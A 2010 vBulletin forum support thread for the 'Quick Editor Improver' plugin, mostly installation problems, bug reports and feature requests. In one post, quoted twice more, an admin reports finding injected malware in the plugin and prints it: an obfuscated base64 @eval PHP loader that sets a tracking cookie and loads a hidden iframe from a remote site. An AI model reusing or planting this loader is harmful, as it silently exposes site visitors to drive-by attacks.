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-   -   New Posting Features - Quick Editor Improver - Support Attachment (https://vborg.vbsupport.ru/showthread.php?t=202160)

a9713030 02-19-2010 05:31 AM

the above code confused me,

ra3doo 02-19-2010 09:05 PM

I Like it Very Much
100 %

NeroSoft 02-20-2010 10:04 AM

Very very good
Installed :)

Makc666 02-23-2010 08:01 AM


Originally Posted by sunrise2006 (Post 1981489)
Thanks Makc666, I think the reason of this BUG is that I have not checked it on the new version of vBulletin, because of to 3.8.0 who I have tested this problem is not exist, for this reason I want to say me which version of vBulletin you are used now that this problem occurred inside?

I always test any product on latest clean version before submitting a bug.
So this one was tested on clean 3.8.4 version.
Also it was tested on two 3.8.4 running forums.

The reason of this bug is that when the user
who use Message Editor Interface -> Basic Editor - A simple text box
tries to save the post
the vBulletin refers to the hook which is used by this product.
And this product tries to save the information
using the data which is not accessible when Message Editor Interface -> Basic Editor - A simple text box is used by user.

That it.

I think you will agree with me that when Message Editor Interface -> Basic Editor - A simple text box is used this product must not be called via hooks!

kau 03-02-2010 04:11 PM

I get this error when editing a post. Disabling this plugin fixes it:

Webpage error details

User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
Timestamp: Tue, 2 Mar 2010 17:59:04 UTC

Message: Object required
Line: 1
Char: 5436
Code: 0
URI: http://www.domain.com/forum/misc.php...uickedit&v=384

Makc666 03-10-2010 08:23 AM


Originally Posted by kau (Post 1995346)
I get this error when editing a post. Disabling this plugin fixes it:

Fix is here -> #1980648

saxahan 04-12-2010 03:20 PM

Thanks a lot. installed ;)

Seshat Diva 07-19-2010 01:23 PM

I have had this hack installed, used it and loved it. :) Now, since I'm using the new vB 4.0 version it isn't usable. Is there a new version of this "Quick Editor Improver" for use in the new 4.0 version ~or~ an update for use of this hack in 4.0 expected soon? Thanks for any information anyone can share!

sunrise2006 07-19-2010 01:37 PM


Originally Posted by Seshat Diva (Post 2071514)
I have had this hack installed, used it and loved it. :) Now, since I'm using the new vB 4.0 version it isn't unusable. Is there a new version of this "Quick Editor Improver" for use in the new 4.0 version ~or~ an update for use of this hack in 4.0 expected soon? Thanks for any information anyone can share!

Yes, I'm now working on new version, that can be installed on vBulletin 4, and I will put in here as soon as possible.

Simon Lloyd 07-19-2010 04:57 PM

Hamed nice to see you back :)

Seshat Diva 07-20-2010 02:41 AM


Originally Posted by sunrise2006 (Post 2071522)
Yes, I'm now working on new version, that can be installed on vBulletin 4, and I will put in here as soon as possible.

Wonderful!! :) Can't wait!! :) I really, really, really miss this editor feature!! Thanks so much for your time in creating this great editor mod for 4.0 users!! :)

acyk 07-20-2010 09:01 PM

Dear sir

thanks for your great work !!

I have a little question need your help .

your quick attachment idea is great , i love it very much

but the output of the "insert all" shows

[ attach ] 3232342 [ /attach ]

[ attach ] 3232343 [ /attach ]

could we just turn it into the other way , for example , if it is image , then output

[ img ] http: //forumsURL/attachment.php?attachmentid=3232342&stc=1&d=127966 0446 [ /img]

[ img ] http: //forumsURL/attachment.php?attachmentid=3232343&stc=1&d=127966 0446 [ /img]

Can you help me to do this ?

thanks a lot

sunrise2006 07-21-2010 06:34 PM


Originally Posted by acyk (Post 2072183)
Dear sir

thanks for your great work !!

I have a little question need your help .

your quick attachment idea is great , i love it very much

but the output of the "insert all" shows

[ attach ] 3232342 [ /attach ]

[ attach ] 3232343 [ /attach ]

could we just turn it into the other way , for example , if it is image , then output

[ img ] http: //forumsURL/attachment.php?attachmentid=3232342&stc=1&d=127966 0446 [ /img]

[ img ] http: //forumsURL/attachment.php?attachmentid=3232343&stc=1&d=127966 0446 [ /img]

Can you help me to do this ?

thanks a lot

Since I have made up this modification, more than one year is up, so to answer this question, I need to reviewing "Quick Editor Improver" modification, that it can need to a little break. I will answer you as soon as possible.

tgralex 07-28-2010 08:12 PM

I have installed it, but all my custom BB codes still don't appear on quick reply panel...
I tried to use "Visible Custom" option, but any tag I put there getting rejected.
What do I do wrong?

sunrise2006 07-29-2010 07:27 AM


Originally Posted by tgralex (Post 2075925)
I have installed it, but all my custom BB codes still don't appear on quick reply panel...
I tried to use "Visible Custom" option, but any tag I put there getting rejected.
What do I do wrong?

If you want to show custom BBCode(s) on the editor, you may need to specify an image for that BBCode.

tgralex 07-29-2010 12:35 PM


Originally Posted by sunrise2006 (Post 2076125)
If you want to show custom BBCode(s) on the editor, you may need to specify an image for that BBCode.

Almost everyone of my BB codes have an image. But which switch/checkbox turns them on to show? Because by default it didn't work.

tgralex 07-29-2010 12:52 PM


Originally Posted by tgralex (Post 2076255)
Almost everyone of my BB codes have an image. But which switch/checkbox turns them on to show? Because by default it didn't work.

Found what was the problem - when choose "Visible Custom" check box, I should not try to put anything in the edit box showing when you select, just check and that makes the trick :)

tgralex 07-29-2010 12:59 PM

Ok... now a different issue :)
I have more BB codes then it fits in the bar (like 5).
I tried to use option "Quick Reply - Form Width" where it says

If buttons over quick reply are outside of the box, you may use this option to specify fit form width.

Note that you may set form width via Style Manager for each style too.
If that is the place, what should I put in there? I tried random numbers from 1 to 300 - result the same: the quick reply stretches to my page width (which is fine) and my regular post edit/new screen is aligned left (which is kinda weird).
I can certainly live with that, but how should I handle that, if it is fixable?
Thank you!

sunrise2006 07-29-2010 01:13 PM


Originally Posted by tgralex (Post 2076270)
Ok... now a different issue :)
I have more BB codes then it fits in the bar (like 5).
I tried to use option "Quick Reply - Form Width" where it says

If that is the place, what should I put in there? I tried random numbers from 1 to 300 - result the same: the quick reply stretches to my page width (which is fine) and my regular post edit/new screen is aligned left (which is kinda weird).
I can certainly live with that, but how should I handle that, if it is fixable?
Thank you!

Every template that started with imp_ prefix is related to this modification, and you may edit by yourself.

acyk 07-29-2010 05:32 PM


Originally Posted by sunrise2006 (Post 2072583)
Since I have made up this modification, more than one year is up, so to answer this question, I need to reviewing "Quick Editor Improver" modification, that it can need to a little break. I will answer you as soon as possible.

Great , Thanks for your reply , or maybe you can just release a new mod with this idea .

thanks again , and awaiting your good news

kau 08-06-2010 03:56 PM

FYI this plugin is a security risk. Someone was able to inject into this plugin some malware that served a cookie for dotur.

Found this when we dumped the plugin:

$muuu = "ba"."se6"."4_de"."cod"."e"; @eval($muuu("aWYgKCFpc3NldCgkX0NPT0tJRVsnRG90dXInX SkpIHsNCiR4YiA9IGFycmF5KCdNU0l FJywnTXlJRScsJ0lFJywnRmlyZWZveCcsJ09wZXJhJywnTmV0c 2NhcGUnLCdDaHJvbWUnLCdTYWZhcmk nLCdNZWRpYSBDZW50ZXInKTsNCiRpZnJhbmQgPSBtdF9yYW5kK DAsMTIzKTsNCiRkb21iID0gImh0dHA 6Ly93d3cua2VrbGxhZC5jby5jYy9nYWJsLnBocCI7DQpmb3JlY WNoICgkeGIgYXMgJHhiYikgew0KaWY oc3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFU l9BR0VOVCddKSxzdHJ0b2xvd2VyKCR 4YmIpKSkgew0KZWNobyA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jd GlvbiBTZXRDb29raWUoY29va2llTmF tZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2llUGF0aCA9I CcvJzsNCiB2YXIgZXhwRGF0ZT1uZXc gRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdld FRpbWUoKSszNzI4MDAwMDApICA7DQo gdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KI GRvY3VtZW50LmNvb2tpZT1jb29raWV OYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIjtwYXRoP SIrZXNjYXBlKGNvb2tpZVBhdGgpKyI 7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJEb 3R1ciIsICJ0dXJrIik7DQo8L3Njcml wdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiI GhlaWdodD0iMSIgc2Nyb2xsaW5nPSJ ubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgb WFyZ2luaGVpZ2h0PSIwIiBzcmM9IiR kb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9D Qp9"));

Simon Lloyd 08-07-2010 11:24 AM


Originally Posted by kau (Post 2080115)
FYI this plugin is a security risk. Someone was able to inject into this plugin some malware that served a cookie for dotur.

Found this when we dumped the plugin:

$muuu = "ba"."se6"."4_de"."cod"."e"; @eval($muuu("aWYgKCFpc3NldCgkX0NPT0tJRVsnRG90dXInX SkpIHsNCiR4YiA9IGFycmF5KCdNU0lFJywnTXlJRScsJ0lFJyw nRmlyZWZveCcsJ09wZXJhJywnTmV0c2NhcGUnLCdDaHJvbWUnL CdTYWZhcmknLCdNZWRpYSBDZW50ZXInKTsNCiRpZnJhbmQgPSB tdF9yYW5kKDAsMTIzKTsNCiRkb21iID0gImh0dHA6Ly93d3cua 2VrbGxhZC5jby5jYy9nYWJsLnBocCI7DQpmb3JlYWNoICgkeGI gYXMgJHhiYikgew0KaWYoc3Ryc3RyKHN0cnRvbG93ZXIoJF9TR VJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2VyKCR 4YmIpKSkgew0KZWNobyA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jd GlvbiBTZXRDb29raWUoY29va2llTmFtZSxjb29raWVDb250ZW5 0KXsNCiB2YXIgY29va2llUGF0aCA9ICcvJzsNCiB2YXIgZXhwR GF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHB EYXRlLmdldFRpbWUoKSszNzI4MDAwMDApICA7DQogdmFyIGV4c GlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KIGRvY3VtZW5 0LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ 29udGVudCkrIjtwYXRoPSIrZXNjYXBlKGNvb2tpZVBhdGgpKyI 7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJEb 3R1ciIsICJ0dXJrIik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmF tZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb 2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR 0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L 2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9"));

Someone can only inject in to php if your server is insecure, if you look over at vbulletin.com you will see a thread dedicated to making your vbulletin & server more secure.

sunrise2006 08-08-2010 01:36 PM


Originally Posted by kau (Post 2080115)
FYI this plugin is a security risk. Someone was able to inject into this plugin some malware that served a cookie for dotur.

Found this when we dumped the plugin:

$muuu = "ba"."se6"."4_de"."cod"."e"; @eval($muuu("aWYgKCFpc3NldCgkX0NPT0tJRVsnRG90dXInX SkpIHsNCiR4YiA9IGFycmF5KCdNU0lFJywnTXlJRScsJ0lFJyw nRmlyZWZveCcsJ09wZXJhJywnTmV0c2NhcGUnLCdDaHJvbWUnL CdTYWZhcmknLCdNZWRpYSBDZW50ZXInKTsNCiRpZnJhbmQgPSB tdF9yYW5kKDAsMTIzKTsNCiRkb21iID0gImh0dHA6Ly93d3cua 2VrbGxhZC5jby5jYy9nYWJsLnBocCI7DQpmb3JlYWNoICgkeGI gYXMgJHhiYikgew0KaWYoc3Ryc3RyKHN0cnRvbG93ZXIoJF9TR VJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2VyKCR 4YmIpKSkgew0KZWNobyA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jd GlvbiBTZXRDb29raWUoY29va2llTmFtZSxjb29raWVDb250ZW5 0KXsNCiB2YXIgY29va2llUGF0aCA9ICcvJzsNCiB2YXIgZXhwR GF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHB EYXRlLmdldFRpbWUoKSszNzI4MDAwMDApICA7DQogdmFyIGV4c GlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KIGRvY3VtZW5 0LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ 29udGVudCkrIjtwYXRoPSIrZXNjYXBlKGNvb2tpZVBhdGgpKyI 7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJEb 3R1ciIsICJ0dXJrIik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmF tZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb 2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR 0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L 2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9"));

I don't think this issue is related to this hack! I checked solution of this report, but I didn't lend anything.

tidefans 08-30-2010 06:35 PM

I've looked through this thread and didn't find the answer to my question (if I overlooked it, please point it out)...

Whenever I use the private message quick reply, it sends a copy of my reply to the recipient AND to me. I do not want/need a copy. How do I remove this so that it only goes to the recipient?

Warlord 11-07-2010 09:21 PM

Loving this hack so far. Great job!

mgurain 11-11-2010 03:02 AM

Looking for 4.x version ?

Wonksta 11-24-2010 05:06 AM

Everything works except the Smilies dropdown menu I have show smilies in other areas of forum set to Yes in BB Code options so I have no idea why this is happening.

DonBassa 11-24-2010 09:49 AM

Asalam A'likum..

i installed it at my forum " vB 3.8.6 " but it ddnt work :) ,
my Qucik Reply still looks like normal one hehe..


DonBassa 11-24-2010 10:12 AM


Originally Posted by DonBassa (Post 2125288)
Asalam A'likum..

i installed it at my forum " vB 3.8.6 " but it ddnt work :) ,
my Qucik Reply still looks like normal one hehe..


I Checked " Apply To " Setting and everything okay there ,
but the mod still not workin'


IRANCITY 11-30-2010 10:40 AM

how can i add it clear link tools ?

JacquiiDesigns 11-30-2010 09:19 PM


Enable Attachment
Enable (Visible) attachment for which type of editors?
When I try setting these options in AdminCP - the boxes are unchecked when the page reloads and the attachments option does not show in quick editor.

Is there a fix for this please?


yotsume 12-01-2010 03:47 PM

Support for Mod: Photo Popup

Can you please add support for this mod: Photo Popup - Insert pictures easily from vB Albums, Photopost, vBGallery, Photoplog

This mod had a button on the quick edit that your mod removed. It allowed us to quickly select and insert photos from our albums or galleries.

sunrise2006 12-06-2010 02:27 PM

New version of this Mod is under constructing, which released date is Q1 2011.

Originally Posted by yotsume (Post 2128002)
Support for Mod: Photo Popup

Can you please add support for this mod: Photo Popup - Insert pictures easily from vB Albums, Photopost, vBGallery, Photoplog

This mod had a button on the quick edit that your mod removed. It allowed us to quickly select and insert photos from our albums or galleries.

I will attention to support this mod (Photo Popup) for the new version.

Please just be patient.

yotsume 12-06-2010 02:33 PM

Great news! Thanks, looking forward to the next version update. :)

Wonksta 12-06-2010 10:45 PM

Sunrise any idea why the smilie button isn't showing for me on my other forums it shows fine. Wondering if you could point me in the right template section to have a look.

sunrise2006 12-07-2010 06:34 PM


Originally Posted by SighK (Post 2130231)
Sunrise any idea why the smilie button isn't showing for me on my other forums it shows fine. Wondering if you could point me in the right template section to have a look.

Are you sure that smiles option is set to TRUE on your board?

Wonksta 12-07-2010 11:17 PM

Allow Smilies in Non Forum Specific Area YES
Allow BB Code in Non Forum Specific Areas YES
Allow [IMG] Code in Non Forum Specific Areas YES


sunrise2006 12-08-2010 07:18 AM


Originally Posted by SighK (Post 2130643)
Allow Smilies in Non Forum Specific Area YES
Allow BB Code in Non Forum Specific Areas YES
Allow [IMG] Code in Non Forum Specific Areas YES


Each of template that started with imp_ prefix is related to this modification. Please check for existence of templates with this prefix and inform me of those.

Wonksta 12-08-2010 07:26 AM

1 Attachment(s)

Originally Posted by sunrise2006 (Post 2130750)
Each of template that started with imp_ prefix is related to this modification. Please check for existence of templates with this prefix and inform me of those.

Attached thanks!

sunrise2006 12-08-2010 07:43 AM


Originally Posted by SighK (Post 2130752)
Attached thanks!

Whereas this image shows all of templates which this modification is needed to them are exists, so I don't think your problem is for because of templates!

Now I'm asked you about another extra buttons on quick editor toolbar, are they visible?

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